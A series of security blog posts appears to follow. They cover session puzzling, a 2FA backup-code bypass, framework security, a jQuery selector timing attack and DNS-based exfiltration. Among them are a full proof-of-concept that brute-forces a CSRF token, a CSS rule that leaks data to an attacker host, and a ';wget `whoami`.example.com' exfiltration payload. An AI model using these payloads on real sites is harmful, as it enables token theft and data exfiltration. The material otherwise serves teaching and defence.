  • Let's summarize the login snippet. What happens here is that we check whether or not the user wants to be notified whenever someone logs into their account. It also checks whether or not the phone number has been confirmed in line 2. If that's the case, the confirmed session variable is assigned the value 'true'.
  • In the index snippet, we see why this session variable is used. If the user wants to get notified when someone logs into their account, it checks the confirmed variable in line 5 and sends an SMS in line 7 if the user has confirmed their phone number. If there is no confirmed phone number, it will send an email instead.
  • The actual problem arises in the admin snippet. In lines 2-13, it checks whether or not a password was supplied and sets a session variable to 'true' if the password matches the one that's needed to access the admin section of the website. However, if you take a closer look, you will see that this session variable has the same name ('confirmed') as the one that's used to check whether or not the user confirmed their phone number. In line 15, it checks whether the confirmed session variable is 'false' (or undefined), and if it's set to 'true', it loads the admin section in line 24.

We don't need to know the password here. When we confirm our phone number, the confirmed session variable will be set to 'true' in line 4 of the login snippet. So if our phone number is confirmed, we can also access the admin panel without typing in a password. The problem here is that session variables are valid across files and that we use the same variable name for different functionality. This is called Session Puzzling.
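
One straightforward fix is to namespace the session keys by purpose, so that unrelated checks can never collide. Here is a sketch in the same vulnerable-pseudocode style as the snippets above (the key names are illustrative):

// Login snippet: record exactly what was verified.
session['phone_confirmed'] = true;      // set only when the phone number is verified

// Admin snippet: use its own flag, set only after the admin password check passes.
if (check_admin_password(input['password']) === true) {
  session['admin_confirmed'] = true;
}
if (session['admin_confirmed'] !== true) {
  generatePasswordForm();               // still locked out, regardless of phone status
} else {
  loadAdminSection();
}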

Bypassing Two-Factor Authentication by Taking Advantage of Missing Access Controls

Two-Factor Authentication (2FA) is a security feature that prevents your account from being stolen if an attacker knows your password. The website you're logging into requires you to provide a second code, in addition to your normal password. Ideally this code is generated using a Time-based One-Time Password (TOTP) algorithm. In most cases, if you enable 2FA, the website provides you with a string of letters and numbers, or a QR code that you need to scan or type into an app on your phone. It will also provide you with some backup codes, in case you lose access to your phone.

The app will then continuously generate a new, additional password based on the secret code and the current UNIX timestamp. Usually, these additional passwords are regenerated every 30 seconds (think Google Authenticator). The idea behind this is that it may be possible for an attacker to retrieve your password by various means, but it's often infeasible for them to gain possession of the device on which your second code (2FA) is generated. In addition to smartphones, there are also dedicated hardware devices that can be used for generating these codes.
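
As an illustration of the algorithm (RFC 6238), here is a minimal sketch in Node.js using only the built-in crypto module; the hard-coded secret is for demonstration only, and real implementations also need to handle base32 secrets and clock drift:

const crypto = require('crypto');

function totp(secret, step = 30, digits = 6) {
  // The moving factor is the number of 30-second steps since the UNIX epoch.
  const counter = Buffer.alloc(8);
  counter.writeBigUInt64BE(BigInt(Math.floor(Date.now() / 1000 / step)));
  // HMAC-SHA1 over the counter, then dynamic truncation as defined in RFC 4226.
  const hmac = crypto.createHmac('sha1', secret).update(counter).digest();
  const offset = hmac[hmac.length - 1] & 0x0f;
  const code = (hmac.readUInt32BE(offset) & 0x7fffffff) % 10 ** digits;
  return code.toString().padStart(digits, '0');
}

console.log(totp(Buffer.from('12345678901234567890'))); // changes every 30 seconds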

The question for an attacker is: can 2FA be bypassed?

In a lot of cases, the answer is 'yes'. TOTP is not the only method websites use to implement 2FA. Some use emails that contain the code, while others use an SMS or a phone call. Because consumers reuse passwords, the website password and the email account password are often the same. Therefore, an attacker can simply log into the email account and read the code. Using different techniques and tricks, attackers can also intercept SMS text messages and phone calls. My conclusion is that TOTP is the way to go.

What About the Server-Side Implementation?

However, it also depends on the server-side implementation of both the algorithm and the 2FA prompt. The possibility of bypassing 2FA is not a totally new concept, but it was once again proven by Nikhil Mittal. He found a way to bypass it without even touching the underlying token generation algorithm. Instead, he used a server-side bug that was present due to careless session handling. In this instance, it led to an access control problem.

Since it was a private bug bounty program, Nikhil Mittal was unable to disclose its name. What he could reveal was how he was able to bypass Two-Factor Authentication. First, he outlined what a typical 2FA login flow on the website looked like:

  1. The user provides an email address and a password
  2. A valid 2FA code is sent to the user's registered telephone number
  3. The website asks for the 2FA code
  4. The user types in the code
  5. The user is logged in

We briefly mentioned that sometimes there are backup codes. Users who lose their device or SIM card have an alternative: select the backup code option in Step 3 and use one of their backup codes.

Nikhil noticed that the website's session basically has two states:

  1. Username and password have been supplied correctly, but the 2FA code has not yet been provided
  2. Username, password and the 2FA code have all been supplied correctly

Obviously, you have unlimited access to all settings if you are in the second state. You can regenerate your backup codes and edit other settings too. But are users in the first state really limited to typing in their 2FA token?

Nikhil Mittal was curious about whether he would be able to access other functionality in the first state. So, he issued a request to the website that would return the backup codes if he were in the second state. The expected behaviour is that the application would throw an error due to missing privileges. The surprise was that it returned the backup codes! That meant that he was simply able to log in with the correct username and password, retrieve the user's backup codes, select the option to use them instead of the actual 2FA code and then supply one of the stolen ones. This immediately granted him access to the account – Two Factor Authentication was bypassed.
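
The missing check boils down to enforcing the second state before any sensitive endpoint responds. Here is a hedged sketch, assuming an Express application with server-side sessions (the route, flag and helper names are illustrative, not from the writeup):

const express = require('express');
const session = require('express-session');

const app = express();
app.use(session({ secret: 'change-me', resave: false, saveUninitialized: false }));

app.get('/account/backup-codes', (req, res) => {
  // State 1 (correct username/password, 2FA still pending) must NOT be enough here.
  if (req.session.fullyAuthenticated !== true) {
    return res.status(403).send('Complete two-factor authentication first');
  }
  // Only a fully authenticated session may read or regenerate backup codes.
  res.json({ backupCodes: loadBackupCodes(req.session.userId) }); // loadBackupCodes is a hypothetical helper
});

app.listen(3000);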

For further information about the vulnerability he found, and what requests he issued in order to retrieve the backup tokens, we highly recommend reading Nikhil Mittal's writeup, How I bypassed 2-Factor Authentication in a bug bounty program.

December 2018 Update for Netsparker Standard


We're delighted to announce a Netsparker Standard release. The highlights of this release are: rewritten Sitemap and Issues panes; a new Vulnerability Families feature; added support for 64-bit smart card drivers and a Swagger 3.0 importer; and several new Send To integrations, including GitLab, Bitbucket, Unfuddle and Zapier.

This announcement highlights what is new and improved in this latest update.

Rewritten Sitemap and Issues Panes

We have rewritten the Sitemap and Issues trees, which improves the performance and adds features like filtering, grouping, sorting and searching. This new Sitemap will enhance the user experience and enable greater productivity for Netsparker users.


For further information, see Viewing the Scan Summary Dashboard in Netsparker Standard.

Vulnerability Families

We have added a Vulnerability Families feature, where similar types of vulnerabilities are no longer reported separately. This addresses the issue of multiple reports for some single vulnerabilities. Netsparker will now report a single instance of vulnerabilities detected from the same family.

64-bit Smart Card Driver Support

We have added support for 64-bit smart card drivers for authentication. This is an improvement on our initial 32-bit support.

Send to Integration Additions

We have added Send To integrations that allow users to send vulnerability details to:

  • GitLab
  • Bitbucket
  • Unfuddle
  • Zapier

Integration Additions

Netsparker Enterprise will also have the same integration.

For further information, see Creating a New Send To Action in Netsparker Standard.

Swagger 3.0 Importer

We have added support for Swagger 3 / OpenAPI link import. This is the new version of Swagger API documentation used for Web Services.

Further Information

For a complete list of what is new, improved and fixed in this update, refer to the Netsparker Standard and Netsparker Enterprise changelogs.


Netsparker Terminates Support for TLS 1.0


Please note that Netsparker will no longer support TLS 1.0, effective 14th of January 2019.

This will affect all HTTPS traffic to Netsparker, including: software updates, the licensing process for Netsparker and vulnerability database updates.

Should you encounter any connection issues please update your settings accordingly.

Contact support@netsparker.com if you require any assistance.

Why Framework Choice Matters in Web Application Security


One of the oldest clichés in web application security is that "it doesn't matter which framework you choose, if you know what you're doing". In my experienced opinion, off the back of a career in the web security industry, this notion is completely false!

This blog post explains why.

Why Framework Choice Matters

Good Developers Always Develop Secure Applications

Someone could try to write a secure web application using nothing but Brainfuck and enough time and effort. They could implement their own session handling and try to make it as secure as possible. But that sounds ridiculous, right?

When I say somebody could implement their own CSRF protection in PHP, it sounds perfectly normal, because that's exactly what everyone keeps doing! However, this is still extremely unwise. A secure session implementation should be one of the responsibilities of the framework, and the same goes for CSRF protection: it shouldn't have to be implemented by the developer.

Security of the Language, Security of the Framework

There is no perfect framework! Every popular framework has had vulnerabilities, and the same is true for all popular web applications. But some applications have a better security track record than others, and the same goes for frameworks. Apache Struts' OGNL Expression Injection, PHP's various low-level vulnerability issues and Perl's serious flaws are good examples.

PHP illustrates the point perfectly. The language itself has had very many vulnerabilities, such as the Zend_Hash_Del_Key_Or_Index flaw or the issues revealed during the Month of PHP Bugs. Think about it: even if the developer knew how to navigate around PHP's countless pitfalls, the application would still be vulnerable if there is a vulnerability in PHP itself. This is without mentioning terrible design issues such as PHP type juggling or PHP object injection.

If you set a directory as protected and your framework can't protect you because the attacker used a different HTTP method, then that's not the developer's fault, it's the framework's fault. That's why frameworks matter: even if you build the most secure application, when your framework is vulnerable, so is your application.

Ask yourself these questions about your framework:

  • Does your framework handle unicode characters correctly?
  • Are functions unexpectedly affected by null bytes?
  • Does it spill out sensitive data when you send one special character in a cookie?

All of these are problems concerning the framework – not your application. Choose a framework with a good security track record. Otherwise you'll have to read the source code of your application and that of the framework, including all its exposed API endpoints, the internal functions you call and the functions your framework calls each time a user issues a request (e.g. routing).

Framework Specific Issues

See? Framework-specific problems matter.

Secure by Default

There are frameworks that approach the design of certain functionality from a 'secure by default' angle. It's quite rare to see HTTP Header Injection (CRLF/HTTP Response Splitting) problems in ASP.NET for example. That's because by default all related .NET functions will refuse to accept new lines. You really have to go out of your way as a developer in order to introduce this vulnerability. However, you would be surprised how creative some developers can be when it comes to introducing vulnerabilities. The irresistible urge of some developers to introduce vulnerabilities previously thought to be impossible is something even the best framework can't fix. Sorry, but that's the truth.

Framework developers themselves are prone to this phenomenon. The best example is Magic Quotes in PHP. An insane number of applications were vulnerable because of it; that's how much of a mess it was. It shouldn't have existed in the first place, which is why it was eventually deprecated.

Inbuilt Security Features

I think every decent developer knows that rolling your own crypto is idiotic, yet somehow it's OK for developers to roll their own CSRF protection, SQL Injection filter, XSS protection library, for example. And if you ask any penetration tester worth their salt, they'll assure you that these developers keep failing miserably.

Here are the questions you need to ask of your framework:

  • Does it support parameterized SQL Queries (prepared statements)?
  • Does it provide a way to separate data and the HTML and carry out the required encoding based on the output location in order to prevent Cross Site Scripting vulnerabilities?
  • Does it provide a secure session implementation?
  • Does it provide a secure authentication mechanism?
  • Does it provide a secure way to execute OS commands? (separating parameters and the executable to avoid injections just like parameterized SQL Queries)
  • Does it provide secure storage options? And path normalization functions?
  • Does it provide a way to avoid email header injections?
  • Is there any function which can protect against new line injections to write safe logs?
  • Is there an inbuilt feature that will apply whitelisting on inputs?

I could go on, but you get the point. Unfortunately, there is hardly a single framework that is completely secure by default. However, frameworks whose developers care about making them secure by default deserve more of our trust. This also means that you shouldn't trust a framework that leaves most of the points above to the user, or makes it hard to use them correctly, even if that makes it easier to work with during development.
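
To illustrate the first question on the list above, here is a minimal sketch of a parameterized query in Node.js using the pg driver (the driver choice, table and column names are assumptions made for the example):

const { Pool } = require('pg');
const pool = new Pool({ connectionString: process.env.DATABASE_URL });

async function findUser(username) {
  // The user-supplied value is passed separately from the SQL text, so it can
  // never change the structure of the query.
  const result = await pool.query('SELECT id, name FROM users WHERE name = $1', [username]);
  return result.rows[0];
}

findUser('alice').then(console.log);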

Documentation, Culture and Sample Code

Documentation and culture around a framework are also pretty important. Take a look at some older Tomcat JSP and IIS 6 ASP examples. Incredibly, all of them have several serious vulnerabilities out of the box. Apparently it's not enough to write vulnerable sample applications; they even need to be deployed automatically during setup so your environment can be vulnerable by default...

For example, many examples in the .NET documentation use parameterized SQL Queries, which sounds great, but the .NET documentation contains so many other flaws and terrible code snippets.

Many vendors have terrible documentation and neglect to provide secure code snippets. In order to increase clarity in the examples, some code samples have been stripped of important security and error checks.

Finally, when it comes to culture, there are other factors to consider. Let's take Perl as an example. You can see more OS Command Injections in Perl applications than in possibly any other framework – because that's how most Perl guys roll. Pass it to an OS command, parse the output and print it to the screen. This is quite a rare practice in many other frameworks* but the Perl community seems to embrace it.

Required Time, Effort and Knowledge for a Secure Application

All of these factors affect the required time, effort and security knowledge necessary to develop a secure web application. If the framework provides built-in security for CSRF with one line of code, this immediately decreases the complexity of the application, and the required time for development and testing. Also, developers don't need to be security experts in order to implement such a check, which makes it easier for beginners to write secure applications.

Or do you really think a junior developer would know that it's possible to carry out Cross-Site Request Forgery attacks against a web service? Believe me, they don't! They also lack a lot of knowledge about the history of application security, such as the fact that it was once possible to execute JavaScript code from within CSS, which would make them more careful when user input is used inside style sheets. They don't know that they need to mark cookies as secure.** They don't know you can bypass many clever XSS protections by using freely available tools such as BeEF. They often know nothing about security, especially when it comes to edge cases. Many developers may never know or understand all these issues. This is why the selected framework should take care of this stuff.

Frameworks Matter In Web Application Security

Let's be honest. There's no perfect framework and there won't be one anytime soon, though we're getting there. Right now, the best solution is to choose the best framework available.

The frameworks I'm most familiar with are PHP, ASP and ASP.NET, where my examples come from. There are many other frameworks such as Ruby on Rails or Struts from which you can observe similar benefits or framework-specific problems.

* Although I need to note that due to many other configuration requirements that task might not be that easy in some frameworks hence not that popular. For example .NET might require several permissions to properly run an executable from an ASP.NET script.

** OK, they need to know about "Secure Cookies" but funny enough many of them still don't. So why not mark all cookies set over SSL as secure and when their code doesn't work they can fix(!) it, at least this way it'll be secure by default and maybe developers will ask themselves "What the hell is a secure cookie? and why would I need it?"

Acquiring Data with CSS Selectors and Javascript on Time Based Attacks


jQuery is a JavaScript library that was released in August 2006 with the motto 'write less, do more'. jQuery simplifies writing JavaScript by making element selection, event chaining and event handling easier. It's safe to say that since the release of jQuery, a large number of client-side libraries have had a de facto dependency on it. In this article, we discuss the research on jQuery selectors and how they can be used as an attack vector that allows hackers to acquire data.

Stealing Data with CSS Selectors and JavaScript | Netsparker

First, we should note that the same method is possible with document.querySelector and CSS selectors. However, since the research we're quoting in this article has a proof of concept based on jQuery, we'll describe the attack in terms of jQuery selectors.

Examples of What You Can Do With jQuery Selectors

jQuery selectors have many uses: they let you select one or more HTML elements by tag, class, ID, attribute value or element index. For example, with this jQuery selector you can choose the element with the 'username' ID:

$("#username")

or

jQuery("#username)

Similarly, you can use the related class value instead of the ID when you’re selecting an element. This code chooses all the elements with the formItem class:

$(".formItem")

or

jQuery(".formItem")

It is also possible to make a selection using element attributes in jQuery. For example, we can choose all the inputs that have their type set as 'password' with this code:

jQuery("input[type='password']")

jQuery makes it possible to use multiple selectors at once. For instance, we can use this selector to choose all the elements that have their type set as 'text', and are of the formElement class:

jQuery(".formElement[type='text']")

jQuery also allows the use of 'starts with' and 'contains' operators in attribute selectors. For example, the input[value^='x'] selector will choose all the inputs whose value begins with 'x'.
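
A quick, illustrative pair of snippets (the attribute values here are arbitrary) showing both operators side by side:

// 'starts with': inputs whose value begins with "x"
jQuery("input[value^='x']")

// 'contains': inputs whose value contains "token" anywhere
jQuery("input[value*='token']")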

jQuery(location.hash)

Using URLs, we let the web know what we're requesting, where we're requesting it from, and how the request should be handled.

The fragment (also known as the anchor) of a URL is the part that comes after the hash sign (#). When a request is made to the URL below, the browser scrolls the page down to the HTML element whose ID attribute matches the fragment.

https://www.example.com/#contactForm
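
To see why the fragment matters for this attack, consider a hypothetical page that passes the fragment straight into a jQuery selector, a pattern that used to be common for scroll or tab navigation. The handler below is purely illustrative and is not taken from the original research:

// Hypothetical vulnerable pattern: whatever the attacker puts after the #
// is evaluated as a jQuery selector on every hash change.
window.addEventListener("hashchange", function () {
    var target = jQuery(decodeURIComponent(location.hash));
    if (target.length) {
        target[0].scrollIntoView();
    }
});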

Example of a Timing Attack Using Multiple jQuery Selectors

We've stated that it is possible to use more than one jQuery selector at once. Now we’ll share a wonderful trick.

If you execute the following code on your browser’s console (Ctrl-Shift-K or Ctrl-Shift-J), you’ll see that it produces a delayed result:

$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) body")

Now execute the following code:

$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) body[noAttribute='noExist']")

Since the page doesn't have a body element whose noAttribute attribute is set to 'noExist', the command returns without a delay. Why does the first command take so long while the second one returns immediately?

Evaluation of Element Selectors From Right to Left

This is where the trick with the selectors comes into play. Since element selectors are evaluated from right to left, the selector engine dismisses the rest of the expression as soon as it sees that the page doesn't have a body element whose noAttribute attribute matches the 'noExist' value.

Why do browsers behave this way? We can answer this with a quote (cited by CSS-Tricks) from Stack Overflow:

… in the situation the browser is looking at most of the selectors it's considering don't match the element in question. So the problem becomes one of deciding that a selector doesn't match as fast as possible; if that requires a bit of extra work in the cases that do match you still win due to all the work you save in the cases that don't match.

After you execute the selector command, the browser walks the DOM elements. If it evaluated the selector from left to right, it would first search for all the input elements, and then it would have to check whether the remaining elements had the formItem class or not.

However, if the comparison is carried out from right to left, it only takes the elements that have the formItem class, and afterwards picks just those that are inputs. Since the most specific, rightmost part of the selector is evaluated first, the right-to-left comparison is much faster. Considering this, we can acquire data from webpages using time-based attacks.
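
You can verify the difference yourself with performance.now(). This is only a measurement sketch for the two selectors shown above, not part of the original research code:

// Run a selector once and return the elapsed time in milliseconds.
function timeSelector(selector) {
    var t0 = performance.now();
    jQuery(selector);
    return performance.now() - t0;
}

var slow = "*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) body";
var fast = slow + "[noAttribute='noExist']";

console.log("matching selector:", timeSelector(slow), "ms");
console.log("non-matching selector:", timeSelector(fast), "ms");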

The Difference between Timing Attacks and Boolean Based Attacks

Hackers can also extract data using CSS selectors in a Boolean-based way, by making matching elements request resources from a server under their control. However, that approach requires the targeted element to support CSS properties such as background/background-image or list-style/list-style-image.

<style>
   #username[value="mikeg"] {
           background:url("https://attacker.host/mikeg");
   }
</style>
<input id="username" value="mikeg" />

An advantage of the method described in this article is that it doesn't have a similar constraint. Using this method, a selector like the following can be used to leak an authentication token:

*:has(:has(:has(*)) :has(*) :has(*)) input[name=authenticity_token][value^='x']

Measuring the Elapsed Time in the Timing Attack

Since our attack is time-based, how can we measure the elapsed time? Eduardo Vela, writing in 2014, provided an explanation. When the attacker's and the victim's websites run on the same thread, an operation that takes a while on the victim website will also slow down a process on the attacker's website, allowing the attacker to measure the elapsed time.

Details of The Timing Attack Exploit

The attacker loads the victim website within an iframe and schedules a function to run later (a callback) using the setTimeout function. He then navigates the victim's page by placing the selector in the URL hash. Since the victim's hashchange handling takes time to evaluate the selector, the callback is delayed, and the delay is measured with the window.performance.now function:

<script>
           const WAIT_TIME = 6;
           const VICTIM_URL = "https://labs.sheddow.xyz/fsf.html";

           const wait = ms => new Promise(resolve => setTimeout(resolve, ms));

           function get_execution_time(selector) {
               var t0 = window.performance.now();

               var p = wait(WAIT_TIME).then(_ => Promise.resolve(measure_time(t0)))

               window.frames[0].location = VICTIM_URL + "#x," + encodeURIComponent(selector) + ","+Math.random();
               
               return p;
           }

           function measure_time(t0) {
               var t = window.performance.now() - t0;
               return t;
           }


           const SLOW_SELECTOR = "*:has(*:has(*) *:has(*) *:has(*) *:has(*))";
           const SELECTOR_TEMPLATE = "input[name=authenticity_token][value^='{}']";

           async function binary_search(prefix, characters) {
               console.log("Testing '" + characters + "'");
               if (characters.length == 1) {
                   return characters[0];
               }

               var mid = Math.floor(characters.length/2);
               var s1 = make_selector(prefix, characters.slice(0, mid));
               var s2 = make_selector(prefix, characters.slice(mid, characters.length));

               var t1 = await get_execution_time(s1);
               var t2 = await get_execution_time(s2);

               if (approximately_equal(t1, t2)) {
                   return null;
               }
               else if (t1 < t2) {
                   return binary_search(prefix, characters.slice(mid, characters.length));
               }
               else {
                   return binary_search(prefix, characters.slice(0, mid));
               }
           }

           function make_selector(prefix, characters) {
               return characters
                   .split("")
                   .map(c => SLOW_SELECTOR + " " + SELECTOR_TEMPLATE.replace("{}", prefix + c))
                   .join(",");
           }

           function approximately_equal(t1, t2) {
               var diff = Math.abs(t1 - t2);
               return diff <= 0.2*t1 || diff <= 0.2*t2;
           }

           const BASE64_CHARS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/";
           const TOKEN_LENGTH = 43;

           async function bruteforce_token() {
               var backtracks = 0;
               var t0 = window.performance.now();
               var misses = 0;
               var token = "";
               while (token.length < TOKEN_LENGTH) {
                   var c = await binary_search(token, BASE64_CHARS);
                   if (c === null) {
                       misses++;
                       if (misses == 3) {
                           token = token.slice(0, -1); // Backtrack
                           backtracks++;
                       }
                   }
                   else {
                       token += c;
                       misses = 0;
                   }
                   document.getElementById("token").innerHTML = token;
                   document.getElementById("percent").innerHTML = Math.round(100*token.length/TOKEN_LENGTH) + "%";
               }
               token += "=";
               document.getElementById("token").innerHTML = token;
               var elapsed = window.performance.now() - t0;
               return {token, elapsed, backtracks};
           }

           window.onload = function() {
               if (location.search === "?attack") {
                   bruteforce_token().then(({token, elapsed, backtracks}) => {
                       wait(0).then(_ => alert("Found " + token + " in " + elapsed/1000 + " seconds with " + backtracks + " backtracks"));
                   });
               }
           }
       </script>

<body>
       <iframe src="https://labs.sheddow.xyz/fsf.html"></iframe>
       <div class="box" id="token"></div>
       <div class="box" id="percent"></div>
</body>

Preventing the Time Based Attack

This attack used an iframe, which may lead some to assume that setting the X-Frame-Options header will prevent the website from loading in an iframe and therefore avoid the attack altogether. But this isn't the case, because the attacker can perform the same operations using window.open and a delayed callback.
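
A hedged sketch of that variant, reusing the wait, WAIT_TIME, measure_time and VICTIM_URL helpers from the proof of concept above, might look like this:

// Variant without an iframe: open the victim in a popup instead.
// X-Frame-Options does not apply to top-level windows opened this way.
var victim = window.open(VICTIM_URL);

function get_execution_time_popup(selector) {
    var t0 = window.performance.now();
    var p = wait(WAIT_TIME).then(_ => Promise.resolve(measure_time(t0)));

    // Navigating the popup's hash triggers the same slow selector evaluation.
    victim.location = VICTIM_URL + "#x," + encodeURIComponent(selector) + "," + Math.random();
    return p;
}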

We've already mentioned that the timing attack is possible only if the attacker's and the victim's websites run on the same thread. So how do you force them onto different threads? You can block the exploit using Site Isolation, a feature introduced in Chrome 63 that forces websites with different origins to run as separate processes, regardless of tabs or iframes.

Some Final Points on Site Isolation

Site Isolation is disabled by default in Chrome 63 and above. You have to visit chrome://flags/#enable-site-per-process to enable it, and restart your browser immediately after changing the setting. You can also enable Site Isolation for specific origins only, by using the parameter below when you launch Chrome:

--isolate-origins=https://google.com,https://youtube.com

The vendor has confirmed the following Site Isolation limitations and known issues:

  • If site isolation is enabled across all websites, an extra 10-20% of performance overhead is added. The feature may be enabled on certain websites to decrease the overhead.
  • The iframes that load different origins look blank on the printed HTML page.
  • In some cases, clicking and scrolling doesn’t work as expected in iframes with different origins.

Headers are Ineffective Against Unique Attack Vectors

In this article, we observed the use of jQuery element selectors and their role in a timing attack discovered by Sigurd Kolltveit. We also shared the research of Eduardo Vela, who blogged about an innovative method of measuring time in such attacks. As discussed, headers alone aren't always enough against unusual attack vectors, and users have to take additional precautions such as enabling Site Isolation.

Further Reading

For further information on the research on jQuery selectors and how they can be used as an attack vector to acquire data, see sheddow's blog post, A timing attack with CSS selectors and Javascript.

DNSFS: Is it Possible to Use DNS as a File System?

In the world of information security and privacy, Domain Name System (DNS) requests present a problem. Not only are they unencrypted by default, making it easy for anyone to intercept and modify them, but attackers have also used them in order to amplify Distributed Denial of Service (DDoS) attacks.

Using the DNS as a File System

Attackers can do this because DNS uses the User Datagram Protocol (UDP) for packets of up to 4096 bytes, and the lack of TCP's three-way handshake makes it easy to spoof the source IP address. This means that attackers can send relatively small requests to the DNS server, which in turn sends much bigger responses to the spoofed IP address. But this is not the only headache with DNS.

Can Outgoing DNS Requests Not Simply Be Blocked?

If you are serious about online security, you need to use a robust firewall in order to block certain incoming and outgoing requests. For example, if you are running a website on a VPS, there is no need to expose its Secure Shell (SSH) service to everyone who connects to the site.

In addition, if your application doesn't need to send outgoing HTTP requests to other servers, it's good practice to block those too. In production, any negative side effects of these restrictions will be almost imperceptible.

However, blocking outgoing DNS requests is a totally different matter. Everything sends DNS queries, ranging from your system and application updates, to your backup system, as well as your web and proxy servers. It is not always possible to whitelist these outgoing requests, so outgoing DNS queries are often not restricted by the firewall.

Exfiltrating Data Over DNS

All this explains why penetration testers – and malicious hackers – love to resort to the DNS protocol for data exfiltration. Let's say there is a command injection on a web application, but HTTP requests are blocked. A payload that exfiltrates the data might look like this:

;wget `whoami`.example.com

First, `whoami` will be replaced with the name of the current user. In the case of Apache web servers, this user is most likely www-data. The command will look like this after it's expanded:

;wget www-data.example.com

wget will send a DNS request, asking for the IP address of the subdomain www-data on example.com. Then, example.com's nameserver will log that DNS request. Even though the subsequent HTTP request may fail, the attacker is still able to extract the data over DNS. However, this is not an ideal way to exfiltrate data: while there are hardly any restrictions on how much data an HTTP POST request can send, DNS data extraction is much more constrained.

Should We Use DNS or HTTP for Data Extraction?

The reason why you should prefer HTTP over DNS for data extraction, whenever you can use it, is simple. In DNS requests, Fully Qualified Domain Names (FQDNs) are limited to 253 characters, and not all of them can be used for data exfiltration.

Let's say you own the domain attacker.com. This already consists of twelve characters. Then you need to add a dot to separate the subdomains, which is another extra character. After that you can send the actual data, but because you need to avoid most special characters, you need to use encoding. Let's say you use hex encoding. This means the size of the data you want to exfiltrate effectively doubles. The parts of the FQDN that are separated by dots are called labels, and each of them must be no longer than 63 characters, containing only letters, digits and hyphens.

So .attacker.com is 13 characters long. Let's see how many characters we can extract.

Let's ignore the attacker.com domain name and all the separating dots. What we are left with is 48 + (3 × 63), or in other words 237 characters. If we use hex encoding, we want an even number of characters, which means that we have 236 characters left for extraction (if we don't want to split one encoded byte across two different messages). However, the actual amount of data is exactly half of that after decoding, so we can extract 118 bytes per request. This means that we need roughly 8,475 messages per megabyte of data.
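
The arithmetic above is easy to script. Here's a Node-style sketch (the chunk sizes are simply the numbers from this example, and the domain is a placeholder) that hex-encodes a message and splits it into FQDNs respecting the 63-character label and 253-character name limits:

// Hex-encode the data, cut it into per-query chunks of 236 characters,
// then split each chunk into labels of at most 63 characters.
const MAX_DATA = 236;

function toDnsQueries(data, domain) {
    const hex = Buffer.from(data, "utf8").toString("hex");
    const queries = [];
    for (let i = 0; i < hex.length; i += MAX_DATA) {
        const chunk = hex.slice(i, i + MAX_DATA);
        const labels = chunk.match(/.{1,63}/g);   // each label <= 63 characters
        queries.push(labels.join(".") + "." + domain);
    }
    return queries;
}

console.log(toDnsQueries("root:x:0:0:root:/root:/bin/bash", "attacker.com"));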

What comes to mind when you read how incredibly inconvenient it is to send large amounts of data using DNS requests? Of course! Storing files in DNS server caches! Confused? Let me explain...

Is DNSFS Really A DNS-Based File System?

A while ago, Ben Cox was testing how long some DNS resolvers actually keep DNS records in their cache. It turned out that some of them were storing the data for up to one week. After writing a blog post about his findings, he became curious about whether or not he could use this behaviour to store files in the caches of DNS resolvers.

  • He first had to scan the internet for open DNS resolvers. When he was finished, he had amassed quite a large list. After waiting for ten days, in order to weed out the resolvers running on dynamic IP addresses, he was still left with many open resolvers.
  • He then wrote DNSFS (DNS File System) – a tool that allows him to store files in DNS records. This is how it works. Let's assume he owns the hostname dnsfs.ns, on which he runs the DNSFS tool. If he wants to store the file names.txt, he can use an open resolver to query some-subdomain.dnsfs.ns. The DNSFS tool will then return a base64-encoded version of the file in a TXT record, with the TTL set to 68 years. After that, the file is deleted from the DNSFS memory.
  • The user can now use DNSFS to query the resolver again and retrieve the file from the cached TXT record. However, if the user wants to store larger files, they are split into parts of 180 bytes each and stored in different TXT records (a rough retrieval sketch follows this list).
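
As a purely illustrative sketch of the retrieval side (the part0.somefile.dnsfs.ns naming scheme, chunk count and resolver IP below are invented for this example, not taken from the DNSFS code), reading a stored file back through an open resolver could look like this in Node:

const { Resolver } = require("dns").promises;

// Query each chunk's TXT record through the open resolver and
// reassemble the base64 pieces into the original file contents.
async function readFromCache(resolverIp, name, chunkCount) {
    const resolver = new Resolver();
    resolver.setServers([resolverIp]);

    let base64 = "";
    for (let i = 0; i < chunkCount; i++) {
        const records = await resolver.resolveTxt(`part${i}.${name}`);
        base64 += records.map(parts => parts.join("")).join("");
    }
    return Buffer.from(base64, "base64").toString("utf8");
}

readFromCache("203.0.113.53", "somefile.dnsfs.ns", 3).then(console.log);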

If you're wondering whether this actually works, check out his blog post (linked above), where you can see the tool in action. He was able to use this technique to store one of his previous blog posts on different DNS servers. But, as tempting as it sounds, please don't store your tax records on open DNS resolvers, as this storage method is highly unreliable!

Netsparker Security Researchers

Ziyahan Albeniz
Sven Morgenroth

New Vulnerability Families Feature

Netsparker is pleased to announce a new feature. It relates to how vulnerabilities are reported: it reduces the number of reported vulnerabilities, saving you time and the resources needed to address them. It also makes scan reports more relevant and accurate.

What is the Vulnerability Families Feature?

Previously Netsparker products reported every single vulnerability that a scan found in a URL. For example, if Netsparker detected Error-based, Blind and Boolean-based SQL Injections in the same URL, each vulnerability would be reported separately. This unnecessarily complicated the scan reports for those sites with many URLs.

With this latest update, Netsparker will group similar vulnerabilities together for reporting and fixing purposes. These groups are known as families, in which vulnerabilities are prioritised based on their exploitability.

  • If an endpoint is vulnerable to similar variants of the same vulnerability, only the most relevant and easiest-to-exploit vulnerabilities will be reported.
  • Once one fix has been completed, it will address the three or four vulnerabilities in the 'family'.

What are the Benefits of the Vulnerability Families Feature?

The new vulnerability families feature will make scan reports shorter and simpler. The quality of vulnerability reporting is far more important than the mere quantity of reported vulnerabilities, especially when many of them are repetitions or false positives. Vulnerability reports are now even more direct and to the point.

In addition, this new feature saves you the time of fixing each iteration of each type of vulnerability separately, enabling you to deliver fixes that have much more impact.

CVSS: Characterizing and Scoring Vulnerabilities

The impact of potential vulnerabilities on our hardware and software increases significantly as our daily activities become more digitized. Preventing these vulnerabilities requires us to know how they work. But we also need an assessment mechanism to evaluate how critical they are. The variety of web application vulnerability detection products in the field further complicates standardizing how vulnerabilities are identified and how their severity is ranked.

CVSS: Characterizing and Scoring Vulnerabilities

Sun Tzu, naturally, has something to say on the matter of enemies in The Art of War:

If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.

